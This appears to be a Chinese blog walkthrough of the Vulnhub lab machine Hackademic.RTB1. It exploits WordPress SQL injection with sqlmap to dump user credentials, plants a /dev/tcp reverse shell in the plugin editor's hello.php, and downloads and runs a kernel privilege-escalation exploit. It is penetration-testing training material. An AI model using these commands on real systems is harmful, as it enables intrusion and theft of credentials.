Vulnhub系列靶机-Hackadmeic.RTB1

Vulnhub系列靶机-Hackadmeic.RTB1

1. 信息收集

1.1 主机扫描

arp-scan -l

image-20230910123002137

1.2 端口扫描

nmap -A -p- 192.168.188.184

image-20230910123759565

扫描到了22端口和80端口,但是22端口的关闭的。

访问Web页面。

image-20230910123616182

使用浏览器插件Wappalyzer扫描网站

image-20230910123707794

看到WordPress,数据库是MySQL,语言是PHP。

根据首页中显示的内容,点击target

image-20230910124238518

页面提示告诉我们要读取root目录下的Key.txt文件。

image-20230910124307870

1.3 目录爆破

爆破/Hackademic_RTB1/网页目录

dirsearch -u http://192.168.188.184/Hackademic_RTB1/ -e * -i 200

image-20230910124525063

观察发现有一个登录页面wp-login.php。

2. 漏洞探测

在点击页面中能点击的链接的时候,发现点击Uncategorized的时候,链接变成了

http://192.168.188.184/Hackademic_RTB1/?cat=1

image-20230910124640071

尝试是否存在SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞。

image-20230910124747474

3. 漏洞利用

使用SqlMap工具进行SQL注入。

查看数据库

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" --dbs --batch 

image-20230910125123842

查看数据库中有哪些表

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -tables --batch

image-20230910125306585

查看wp_users表中字段

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns --batch

image-20230910125441481

这里我们只关注user_login和user_pass字段。

获取字段信息

sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns -C "user_login,user_pass" -dump --batch

image-20230910125648902

这里直接使用第三个用户名和密码进行登录,其他账户通过查看都没有什么可靠的信息。

image-20230910130217124

发现在Plugins选项里有一个Plugin Editor编辑的地址。可以产生过添加反弹shell。

3.1 反弹Shell

system("bash -c 'sh -i &>/dev/tcp/192.168.188.157/8888 0>&1'");

image-20230910132406678

kali中开启监听

nc -lnvp 8888

image-20230910130517734

提交之后,需要获取到上传的路径,才可以触发反弹shell。

之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有上传的图片,视频和附件。

并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。(这里就存在目录遍历漏洞)

image-20230910130850517

刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。点击pluguns进行查看。

image-20230910131104899

点击hello.php后触发反弹shell

image-20230910132519556

4. 内核提权

查看内核版本

uname -a

image-20230910132621342

搜索系统内核版本漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

image-20230910132944564

查看完整路径

searchsploit -p linux/local/15285.c 

image-20230910133028252

/usr/share/exploitdb/exploits/linux/local/15285.c

将15285.c文件拷贝到桌面上,然后在桌面上开启一个http服务

python3 -m http.server 9999

image-20230910133601577

然后切换到tmp目录,执行wget命令下载该工具

wget http://192.168.188.157:9999/15285.c

image-20230910133819689

然后赋予该文件可执行权限

chmod 777 15285.c

image-20230910134031572

将15285.c进行预处理,汇编,编译,并链接形成可执行文件exp。-o选项用来指定输出文件的文件名

image-20230910134327352

执行exp文件

image-20230910134416263

查看key.txt文件。

image-20230910134545165

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值